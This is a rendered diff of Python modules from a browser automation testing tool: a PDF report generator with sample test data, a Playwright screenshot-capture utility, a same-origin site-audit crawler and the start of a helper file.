story.append(Paragraph(f"Message: {error.get('message', 'No message')}", self.styles['Normal']))
|
| 627 |
+
story.append(Paragraph(f"Severity: {error.get('severity', 'Unknown')}", self.styles['Normal']))
|
| 628 |
+
story.append(Paragraph(f"Timestamp: {error.get('timestamp', 'Unknown')}", self.styles['Normal']))
|
| 629 |
+
story.append(Paragraph(f"URL: {error.get('url', 'Unknown')}", self.styles['Normal']))
|
| 630 |
+
story.append(Paragraph(f"Source: {error.get('source', 'Unknown')}", self.styles['Normal']))
|
| 631 |
+
story.append(Spacer(1, 6))
|
| 632 |
+
|
| 633 |
+
if len(detailed_errors) > 10:
|
| 634 |
+
story.append(Paragraph(f"... and {len(detailed_errors) - 10} more errors", self.styles['Normal']))
|
| 635 |
+
|
| 636 |
+
return story
|
| 637 |
+
|
| 638 |
+
|
| 639 |
+
def create_sample_test_data() -> Dict[str, Any]:
|
| 640 |
+
"""Create sample test data for demonstration purposes."""
|
| 641 |
+
return {
|
| 642 |
+
'duration': '2 hours 15 minutes',
|
| 643 |
+
'total_tests': 15,
|
| 644 |
+
'passed_tests': 12,
|
| 645 |
+
'failed_tests': 2,
|
| 646 |
+
'error_tests': 1,
|
| 647 |
+
'success_rate': 80.0,
|
| 648 |
+
'passed_percentage': 80.0,
|
| 649 |
+
'failed_percentage': 13.3,
|
| 650 |
+
'error_percentage': 6.7,
|
| 651 |
+
'browser': 'Chrome',
|
| 652 |
+
'browser_version': '119.0.6045.105',
|
| 653 |
+
'os': 'Windows 10',
|
| 654 |
+
'framework': 'Fagun Browser Automation Testing Agent',
|
| 655 |
+
'execution_time': '2024-01-15 14:30:00',
|
| 656 |
+
'test_data_source': 'Production Environment',
|
| 657 |
+
'performance_metrics': {
|
| 658 |
+
'avg_response_time': '1.2 seconds',
|
| 659 |
+
'max_response_time': '3.5 seconds',
|
| 660 |
+
'min_response_time': '0.8 seconds'
|
| 661 |
+
},
|
| 662 |
+
'test_cases': [
|
| 663 |
+
{
|
| 664 |
+
'name': 'Login Functionality Test',
|
| 665 |
+
'status': 'PASSED',
|
| 666 |
+
'duration': '45 seconds',
|
| 667 |
+
'description': 'Test user login with valid credentials',
|
| 668 |
+
'expected_result': 'User should be logged in successfully',
|
| 669 |
+
'actual_result': 'User logged in successfully'
|
| 670 |
+
},
|
| 671 |
+
{
|
| 672 |
+
'name': 'Form Submission Test',
|
| 673 |
+
'status': 'FAILED',
|
| 674 |
+
'duration': '30 seconds',
|
| 675 |
+
'description': 'Test form submission with required fields',
|
| 676 |
+
'expected_result': 'Form should submit successfully',
|
| 677 |
+
'actual_result': 'Form submission failed with validation error',
|
| 678 |
+
'error_message': 'Required field "email" was not filled'
|
| 679 |
+
},
|
| 680 |
+
{
|
| 681 |
+
'name': 'Navigation Test',
|
| 682 |
+
'status': 'ERROR',
|
| 683 |
+
'duration': '15 seconds',
|
| 684 |
+
'description': 'Test page navigation functionality',
|
| 685 |
+
'expected_result': 'Page should navigate to target URL',
|
| 686 |
+
'actual_result': 'Navigation failed due to timeout',
|
| 687 |
+
'error_message': 'Page load timeout after 30 seconds'
|
| 688 |
+
}
|
| 689 |
+
],
|
| 690 |
+
'screenshots': [
|
| 691 |
+
{
|
| 692 |
+
'description': 'Login page screenshot',
|
| 693 |
+
'path': 'screenshots/login_page.png'
|
| 694 |
+
},
|
| 695 |
+
{
|
| 696 |
+
'description': 'Form validation error',
|
| 697 |
+
'path': 'screenshots/form_error.png'
|
| 698 |
+
}
|
| 699 |
+
],
|
| 700 |
+
'bugs': [
|
| 701 |
+
{
|
| 702 |
+
'title': 'Form validation not working properly',
|
| 703 |
+
'severity': 'High',
|
| 704 |
+
'status': 'Open',
|
| 705 |
+
'description': 'Form allows submission without required fields',
|
| 706 |
+
'steps_to_reproduce': '1. Navigate to form page\n2. Leave email field empty\n3. Click submit',
|
| 707 |
+
'expected_behavior': 'Form should show validation error',
|
| 708 |
+
'actual_behavior': 'Form submits with empty email field'
|
| 709 |
+
}
|
| 710 |
+
],
|
| 711 |
+
'key_findings': [
|
| 712 |
+
'Login functionality works correctly',
|
| 713 |
+
'Form validation has critical issues',
|
| 714 |
+
'Navigation performance needs improvement',
|
| 715 |
+
'Overall system stability is good'
|
| 716 |
+
],
|
| 717 |
+
'recommendations': [
|
| 718 |
+
'Fix form validation issues immediately',
|
| 719 |
+
'Improve page load performance',
|
| 720 |
+
'Add more comprehensive error handling',
|
| 721 |
+
'Implement better user feedback for form errors'
|
| 722 |
+
],
|
| 723 |
+
'notes': [
|
| 724 |
+
'This report was generated automatically by the Fagun Browser Automation Testing Agent.',
|
| 725 |
+
'All test results and screenshots are based on the actual execution data.',
|
| 726 |
+
'For questions or clarifications, please contact the test automation team.'
|
| 727 |
+
]
|
| 728 |
+
}
|
| 729 |
+
|
| 730 |
+
|
| 731 |
+
if __name__ == "__main__":
|
| 732 |
+
# Example usage
|
| 733 |
+
generator = PDFReportGenerator()
|
| 734 |
+
sample_data = create_sample_test_data()
|
| 735 |
+
report_path = generator.generate_report(sample_data)
|
| 736 |
+
print(f"PDF report generated: {report_path}")
|
src/utils/screenshot_capture.py
ADDED
|
@@ -0,0 +1,287 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Screenshot Capture
|
| 3 |
+
==============================================================
|
| 4 |
+
|
| 5 |
+
Screenshot capture utilities for testing reports and documentation.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import os
|
| 13 |
+
import base64
|
| 14 |
+
from datetime import datetime
|
| 15 |
+
from pathlib import Path
|
| 16 |
+
from typing import Optional, Dict, Any
|
| 17 |
+
from playwright.async_api import Page
|
| 18 |
+
import logging
|
| 19 |
+
|
| 20 |
+
logger = logging.getLogger(__name__)
|
| 21 |
+
|
| 22 |
+
|
| 23 |
+
class ScreenshotCapture:
|
| 24 |
+
"""Handles screenshot capture during test execution."""
|
| 25 |
+
|
| 26 |
+
def __init__(self, output_dir: str = "screenshots"):
|
| 27 |
+
self.output_dir = Path(output_dir)
|
| 28 |
+
self.output_dir.mkdir(exist_ok=True)
|
| 29 |
+
self.screenshots = []
|
| 30 |
+
|
| 31 |
+
async def capture_screenshot(
|
| 32 |
+
self,
|
| 33 |
+
page: Page,
|
| 34 |
+
description: str = "Test Screenshot",
|
| 35 |
+
full_page: bool = True
|
| 36 |
+
) -> Dict[str, Any]:
|
| 37 |
+
"""
|
| 38 |
+
Capture a screenshot of the current page.
|
| 39 |
+
|
| 40 |
+
Args:
|
| 41 |
+
page: Playwright page object
|
| 42 |
+
description: Description of the screenshot
|
| 43 |
+
full_page: Whether to capture full page or viewport only
|
| 44 |
+
|
| 45 |
+
Returns:
|
| 46 |
+
Dictionary containing screenshot metadata
|
| 47 |
+
"""
|
| 48 |
+
try:
|
| 49 |
+
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S_%f")[:-3]
|
| 50 |
+
filename = f"screenshot_{timestamp}.png"
|
| 51 |
+
filepath = self.output_dir / filename
|
| 52 |
+
|
| 53 |
+
# Capture screenshot
|
| 54 |
+
if full_page:
|
| 55 |
+
await page.screenshot(path=str(filepath), full_page=True)
|
| 56 |
+
else:
|
| 57 |
+
await page.screenshot(path=str(filepath), full_page=False)
|
| 58 |
+
|
| 59 |
+
# Get page info
|
| 60 |
+
url = page.url
|
| 61 |
+
title = await page.title()
|
| 62 |
+
|
| 63 |
+
screenshot_data = {
|
| 64 |
+
"filename": filename,
|
| 65 |
+
"path": str(filepath),
|
| 66 |
+
"description": description,
|
| 67 |
+
"timestamp": datetime.now().isoformat(),
|
| 68 |
+
"url": url,
|
| 69 |
+
"title": title,
|
| 70 |
+
"full_page": full_page
|
| 71 |
+
}
|
| 72 |
+
|
| 73 |
+
self.screenshots.append(screenshot_data)
|
| 74 |
+
logger.info(f"Screenshot captured: {filename}")
|
| 75 |
+
|
| 76 |
+
return screenshot_data
|
| 77 |
+
|
| 78 |
+
except Exception as e:
|
| 79 |
+
logger.error(f"Error capturing screenshot: {str(e)}")
|
| 80 |
+
return {
|
| 81 |
+
"filename": None,
|
| 82 |
+
"path": None,
|
| 83 |
+
"description": description,
|
| 84 |
+
"timestamp": datetime.now().isoformat(),
|
| 85 |
+
"url": page.url if page else "Unknown",
|
| 86 |
+
"title": "Error",
|
| 87 |
+
"full_page": full_page,
|
| 88 |
+
"error": str(e)
|
| 89 |
+
}
|
| 90 |
+
|
| 91 |
+
async def capture_element_screenshot(
|
| 92 |
+
self,
|
| 93 |
+
page: Page,
|
| 94 |
+
selector: str,
|
| 95 |
+
description: str = "Element Screenshot"
|
| 96 |
+
) -> Dict[str, Any]:
|
| 97 |
+
"""
|
| 98 |
+
Capture a screenshot of a specific element.
|
| 99 |
+
|
| 100 |
+
Args:
|
| 101 |
+
page: Playwright page object
|
| 102 |
+
selector: CSS selector for the element
|
| 103 |
+
description: Description of the screenshot
|
| 104 |
+
|
| 105 |
+
Returns:
|
| 106 |
+
Dictionary containing screenshot metadata
|
| 107 |
+
"""
|
| 108 |
+
try:
|
| 109 |
+
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S_%f")[:-3]
|
| 110 |
+
filename = f"element_{timestamp}.png"
|
| 111 |
+
filepath = self.output_dir / filename
|
| 112 |
+
|
| 113 |
+
# Wait for element to be visible
|
| 114 |
+
element = await page.wait_for_selector(selector, timeout=5000)
|
| 115 |
+
|
| 116 |
+
# Capture element screenshot
|
| 117 |
+
await element.screenshot(path=str(filepath))
|
| 118 |
+
|
| 119 |
+
screenshot_data = {
|
| 120 |
+
"filename": filename,
|
| 121 |
+
"path": str(filepath),
|
| 122 |
+
"description": f"{description} - Element: {selector}",
|
| 123 |
+
"timestamp": datetime.now().isoformat(),
|
| 124 |
+
"url": page.url,
|
| 125 |
+
"title": await page.title(),
|
| 126 |
+
"selector": selector,
|
| 127 |
+
"type": "element"
|
| 128 |
+
}
|
| 129 |
+
|
| 130 |
+
self.screenshots.append(screenshot_data)
|
| 131 |
+
logger.info(f"Element screenshot captured: {filename}")
|
| 132 |
+
|
| 133 |
+
return screenshot_data
|
| 134 |
+
|
| 135 |
+
except Exception as e:
|
| 136 |
+
logger.error(f"Error capturing element screenshot: {str(e)}")
|
| 137 |
+
return {
|
| 138 |
+
"filename": None,
|
| 139 |
+
"path": None,
|
| 140 |
+
"description": f"{description} - Element: {selector}",
|
| 141 |
+
"timestamp": datetime.now().isoformat(),
|
| 142 |
+
"url": page.url if page else "Unknown",
|
| 143 |
+
"title": "Error",
|
| 144 |
+
"selector": selector,
|
| 145 |
+
"type": "element",
|
| 146 |
+
"error": str(e)
|
| 147 |
+
}
|
| 148 |
+
|
| 149 |
+
async def capture_error_screenshot(
|
| 150 |
+
self,
|
| 151 |
+
page: Page,
|
| 152 |
+
error_message: str,
|
| 153 |
+
description: str = "Error Screenshot"
|
| 154 |
+
) -> Dict[str, Any]:
|
| 155 |
+
"""
|
| 156 |
+
Capture a screenshot when an error occurs.
|
| 157 |
+
|
| 158 |
+
Args:
|
| 159 |
+
page: Playwright page object
|
| 160 |
+
error_message: The error message
|
| 161 |
+
description: Description of the screenshot
|
| 162 |
+
|
| 163 |
+
Returns:
|
| 164 |
+
Dictionary containing screenshot metadata
|
| 165 |
+
"""
|
| 166 |
+
try:
|
| 167 |
+
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S_%f")[:-3]
|
| 168 |
+
filename = f"error_{timestamp}.png"
|
| 169 |
+
filepath = self.output_dir / filename
|
| 170 |
+
|
| 171 |
+
# Capture screenshot
|
| 172 |
+
await page.screenshot(path=str(filepath), full_page=True)
|
| 173 |
+
|
| 174 |
+
screenshot_data = {
|
| 175 |
+
"filename": filename,
|
| 176 |
+
"path": str(filepath),
|
| 177 |
+
"description": f"{description} - Error: {error_message[:50]}...",
|
| 178 |
+
"timestamp": datetime.now().isoformat(),
|
| 179 |
+
"url": page.url,
|
| 180 |
+
"title": await page.title(),
|
| 181 |
+
"error_message": error_message,
|
| 182 |
+
"type": "error"
|
| 183 |
+
}
|
| 184 |
+
|
| 185 |
+
self.screenshots.append(screenshot_data)
|
| 186 |
+
logger.info(f"Error screenshot captured: {filename}")
|
| 187 |
+
|
| 188 |
+
return screenshot_data
|
| 189 |
+
|
| 190 |
+
except Exception as e:
|
| 191 |
+
logger.error(f"Error capturing error screenshot: {str(e)}")
|
| 192 |
+
return {
|
| 193 |
+
"filename": None,
|
| 194 |
+
"path": None,
|
| 195 |
+
"description": f"{description} - Error: {error_message[:50]}...",
|
| 196 |
+
"timestamp": datetime.now().isoformat(),
|
| 197 |
+
"url": page.url if page else "Unknown",
|
| 198 |
+
"title": "Error",
|
| 199 |
+
"error_message": error_message,
|
| 200 |
+
"type": "error",
|
| 201 |
+
"error": str(e)
|
| 202 |
+
}
|
| 203 |
+
|
| 204 |
+
def get_screenshots(self) -> list:
|
| 205 |
+
"""Get all captured screenshots."""
|
| 206 |
+
return self.screenshots
|
| 207 |
+
|
| 208 |
+
def clear_screenshots(self):
|
| 209 |
+
"""Clear the screenshots list."""
|
| 210 |
+
self.screenshots = []
|
| 211 |
+
|
| 212 |
+
def get_screenshot_summary(self) -> Dict[str, Any]:
|
| 213 |
+
"""Get a summary of captured screenshots."""
|
| 214 |
+
total_screenshots = len(self.screenshots)
|
| 215 |
+
successful_screenshots = len([s for s in self.screenshots if s.get('filename')])
|
| 216 |
+
error_screenshots = len([s for s in self.screenshots if s.get('type') == 'error'])
|
| 217 |
+
element_screenshots = len([s for s in self.screenshots if s.get('type') == 'element'])
|
| 218 |
+
|
| 219 |
+
return {
|
| 220 |
+
"total_screenshots": total_screenshots,
|
| 221 |
+
"successful_screenshots": successful_screenshots,
|
| 222 |
+
"error_screenshots": error_screenshots,
|
| 223 |
+
"element_screenshots": element_screenshots,
|
| 224 |
+
"screenshots": self.screenshots
|
| 225 |
+
}
|
| 226 |
+
|
| 227 |
+
def save_screenshots_metadata(self, filepath: str):
|
| 228 |
+
"""Save screenshots metadata to a JSON file."""
|
| 229 |
+
try:
|
| 230 |
+
metadata = {
|
| 231 |
+
"capture_time": datetime.now().isoformat(),
|
| 232 |
+
"total_screenshots": len(self.screenshots),
|
| 233 |
+
"screenshots": self.screenshots
|
| 234 |
+
}
|
| 235 |
+
|
| 236 |
+
with open(filepath, 'w') as f:
|
| 237 |
+
import json
|
| 238 |
+
json.dump(metadata, f, indent=2)
|
| 239 |
+
|
| 240 |
+
logger.info(f"Screenshots metadata saved to: {filepath}")
|
| 241 |
+
|
| 242 |
+
except Exception as e:
|
| 243 |
+
logger.error(f"Error saving screenshots metadata: {str(e)}")
|
| 244 |
+
|
| 245 |
+
|
| 246 |
+
# Global screenshot capture instance
|
| 247 |
+
screenshot_capture = ScreenshotCapture()
|
| 248 |
+
|
| 249 |
+
|
| 250 |
+
async def capture_test_screenshot(
|
| 251 |
+
page: Page,
|
| 252 |
+
test_name: str,
|
| 253 |
+
step_description: str = "Test Step"
|
| 254 |
+
) -> Dict[str, Any]:
|
| 255 |
+
"""
|
| 256 |
+
Convenience function to capture a test screenshot.
|
| 257 |
+
|
| 258 |
+
Args:
|
| 259 |
+
page: Playwright page object
|
| 260 |
+
test_name: Name of the test
|
| 261 |
+
step_description: Description of the test step
|
| 262 |
+
|
| 263 |
+
Returns:
|
| 264 |
+
Dictionary containing screenshot metadata
|
| 265 |
+
"""
|
| 266 |
+
description = f"{test_name} - {step_description}"
|
| 267 |
+
return await screenshot_capture.capture_screenshot(page, description)
|
| 268 |
+
|
| 269 |
+
|
| 270 |
+
async def capture_error_screenshot(
|
| 271 |
+
page: Page,
|
| 272 |
+
test_name: str,
|
| 273 |
+
error_message: str
|
| 274 |
+
) -> Dict[str, Any]:
|
| 275 |
+
"""
|
| 276 |
+
Convenience function to capture an error screenshot.
|
| 277 |
+
|
| 278 |
+
Args:
|
| 279 |
+
page: Playwright page object
|
| 280 |
+
test_name: Name of the test
|
| 281 |
+
error_message: The error message
|
| 282 |
+
|
| 283 |
+
Returns:
|
| 284 |
+
Dictionary containing screenshot metadata
|
| 285 |
+
"""
|
| 286 |
+
description = f"{test_name} - Error"
|
| 287 |
+
return await screenshot_capture.capture_error_screenshot(page, error_message, description)
|
src/utils/site_audit.py
ADDED
|
@@ -0,0 +1,144 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Site Audit
|
| 3 |
+
======================================================
|
| 4 |
+
|
| 5 |
+
Site-wide intelligent audit: crawl pages, detect broken links, collect console/network errors,
|
| 6 |
+
run form tests where applicable, and generate an aggregated report.
|
| 7 |
+
"""
|
| 8 |
+
|
| 9 |
+
import asyncio
|
| 10 |
+
import logging
|
| 11 |
+
from typing import Any, Dict, List, Set, Tuple
|
| 12 |
+
from urllib.parse import urljoin, urlparse
|
| 13 |
+
|
| 14 |
+
from playwright.async_api import Page
|
| 15 |
+
|
| 16 |
+
from src.utils.intelligent_form_testing import IntelligentFormTester
|
| 17 |
+
|
| 18 |
+
logger = logging.getLogger(__name__)
|
| 19 |
+
|
| 20 |
+
|
| 21 |
+
class SiteAuditor:
|
| 22 |
+
def __init__(self, page: Page, form_tester_factory):
|
| 23 |
+
"""page: a Playwright Page bound to a BrowserContext
|
| 24 |
+
form_tester_factory: callable that returns IntelligentFormTester for a given page
|
| 25 |
+
"""
|
| 26 |
+
self.page = page
|
| 27 |
+
self.form_tester_factory = form_tester_factory
|
| 28 |
+
|
| 29 |
+
async def audit(self, start_url: str, max_pages: int = 10, max_depth: int = 2) -> Dict[str, Any]:
|
| 30 |
+
visited: Set[str] = set()
|
| 31 |
+
queue: List[Tuple[str, int]] = [(start_url, 0)]
|
| 32 |
+
|
| 33 |
+
origin = self._origin(start_url)
|
| 34 |
+
|
| 35 |
+
pages_summary: List[Dict[str, Any]] = []
|
| 36 |
+
broken_links: List[Dict[str, str]] = []
|
| 37 |
+
|
| 38 |
+
while queue and len(visited) < max_pages:
|
| 39 |
+
url, depth = queue.pop(0)
|
| 40 |
+
if url in visited or depth > max_depth:
|
| 41 |
+
continue
|
| 42 |
+
visited.add(url)
|
| 43 |
+
|
| 44 |
+
try:
|
| 45 |
+
await self.page.goto(url, wait_until='domcontentloaded')
|
| 46 |
+
await asyncio.sleep(0.5)
|
| 47 |
+
|
| 48 |
+
page_result: Dict[str, Any] = {
|
| 49 |
+
"url": url,
|
| 50 |
+
"title": await self.page.title(),
|
| 51 |
+
"console_errors": await self._collect_console_errors(),
|
| 52 |
+
"network_issues": [],
|
| 53 |
+
}
|
| 54 |
+
|
| 55 |
+
# Basic broken link scan on current page (HEAD requests)
|
| 56 |
+
links = await self._extract_links()
|
| 57 |
+
same_origin_links = [l for l in links if self._origin(l) == origin]
|
| 58 |
+
|
| 59 |
+
# Check a subset to keep runtime in bounds
|
| 60 |
+
for link in same_origin_links[:50]:
|
| 61 |
+
status = await self._head_status(link)
|
| 62 |
+
if status >= 400:
|
| 63 |
+
broken = {"href": link, "status": str(status), "on_page": url}
|
| 64 |
+
broken_links.append(broken)
|
| 65 |
+
|
| 66 |
+
# Run intelligent form testing if forms exist
|
| 67 |
+
has_form = (await self.page.locator("form").count()) > 0
|
| 68 |
+
if has_form:
|
| 69 |
+
tester: IntelligentFormTester = self.form_tester_factory(self.page)
|
| 70 |
+
try:
|
| 71 |
+
await tester.discover_form_fields()
|
| 72 |
+
scenarios = await tester.generate_test_scenarios()
|
| 73 |
+
await tester.execute_test_scenarios(scenarios)
|
| 74 |
+
form_report = await tester.generate_comprehensive_report()
|
| 75 |
+
|
| 76 |
+
# Add basic accessibility checks for the page
|
| 77 |
+
a11y = await tester.run_basic_accessibility_checks()
|
| 78 |
+
|
| 79 |
+
page_result["form_testing"] = form_report
|
| 80 |
+
page_result["accessibility"] = a11y
|
| 81 |
+
except Exception as e:
|
| 82 |
+
page_result["form_testing_error"] = str(e)
|
| 83 |
+
|
| 84 |
+
pages_summary.append(page_result)
|
| 85 |
+
|
| 86 |
+
# Enqueue next links
|
| 87 |
+
for link in same_origin_links:
|
| 88 |
+
if link not in visited:
|
| 89 |
+
queue.append((link, depth + 1))
|
| 90 |
+
|
| 91 |
+
except Exception as e:
|
| 92 |
+
logger.warning(f"Audit navigation error at {url}: {e}")
|
| 93 |
+
pages_summary.append({"url": url, "error": str(e)})
|
| 94 |
+
|
| 95 |
+
return {
|
| 96 |
+
"start_url": start_url,
|
| 97 |
+
"total_pages_visited": len(visited),
|
| 98 |
+
"pages": pages_summary,
|
| 99 |
+
"broken_links": broken_links,
|
| 100 |
+
}
|
| 101 |
+
|
| 102 |
+
async def _extract_links(self) -> List[str]:
|
| 103 |
+
anchors = await self.page.locator("a[href]").all()
|
| 104 |
+
urls: List[str] = []
|
| 105 |
+
base = self.page.url
|
| 106 |
+
for a in anchors[:200]:
|
| 107 |
+
try:
|
| 108 |
+
href = await a.get_attribute("href")
|
| 109 |
+
if href:
|
| 110 |
+
urls.append(urljoin(base, href))
|
| 111 |
+
except Exception:
|
| 112 |
+
continue
|
| 113 |
+
return urls
|
| 114 |
+
|
| 115 |
+
async def _head_status(self, url: str) -> int:
|
| 116 |
+
try:
|
| 117 |
+
# Use context.request for lightweight request
|
| 118 |
+
resp = await self.page.context.request.get(url, max_redirects=2)
|
| 119 |
+
return resp.status
|
| 120 |
+
except Exception:
|
| 121 |
+
return 599
|
| 122 |
+
|
| 123 |
+
async def _collect_console_errors(self) -> List[str]:
|
| 124 |
+
# Snapshot console errors present in DOM if any common containers exist
|
| 125 |
+
errors: List[str] = []
|
| 126 |
+
try:
|
| 127 |
+
# Heuristic: look for aria role alert or typical error classes
|
| 128 |
+
loc = self.page.locator(".error, .alert-danger, [role='alert']").all()
|
| 129 |
+
for l in await loc:
|
| 130 |
+
try:
|
| 131 |
+
txt = await l.text_content()
|
| 132 |
+
if txt:
|
| 133 |
+
errors.append(txt.strip())
|
| 134 |
+
except Exception:
|
| 135 |
+
continue
|
| 136 |
+
except Exception:
|
| 137 |
+
pass
|
| 138 |
+
return errors
|
| 139 |
+
|
| 140 |
+
def _origin(self, url: str) -> str:
|
| 141 |
+
u = urlparse(url)
|
| 142 |
+
return f"{u.scheme}://{u.netloc}"
|
| 143 |
+
|
| 144 |
+
|
src/utils/utils.py
ADDED
|
@@ -0,0 +1,50 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Utilities
|
| 3 |
+
=====================================================
|
| 4 |
+
|
| 5 |
+
Utility functions and helpers for the Fagun Browser Automation Testing Agent.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import base64
|
| 13 |
+
import os
|
| 14 |
+
import time
|
| 15 |
+
from pathlib import Path
|
| 16 |
+
from typing import Dict, Optional
|
| 17 |
+
import requests
|
| 18 |
+
import json
|
| 19 |
+
import gradio as gr
|
| 20 |
+
import uuid
|
| 21 |
+
|
| 22 |
+
|
| 23 |
+
def encode_image(img_path):
|
| 24 |
+
if not img_path:
|
| 25 |
+
return None
|
| 26 |
+
with open(img_path, "rb") as fin:
|
| 27 |
+
image_data = base64.b64encode(fin.read()).decode("utf-8")
|
| 28 |
+
return image_data
|
| 29 |
+
|
| 30 |
+
|
| 31 |
+
def get_latest_files(directory: str, file_types: list = ['.webm', '.zip']) -> Dict[str, Optional[str]]:
|
| 32 |
+
"""Get the latest recording and trace files"""
|
| 33 |
+
latest_files: Dict[str, Optional[str]] = {ext: None for ext in file_types}
|
| 34 |
+
|
| 35 |
+
if not os.path.exists(directory):
|
| 36 |
+
os.makedirs(directory, exist_ok=True)
|
| 37 |
+
return latest_files
|
| 38 |
+
|
| 39 |
+
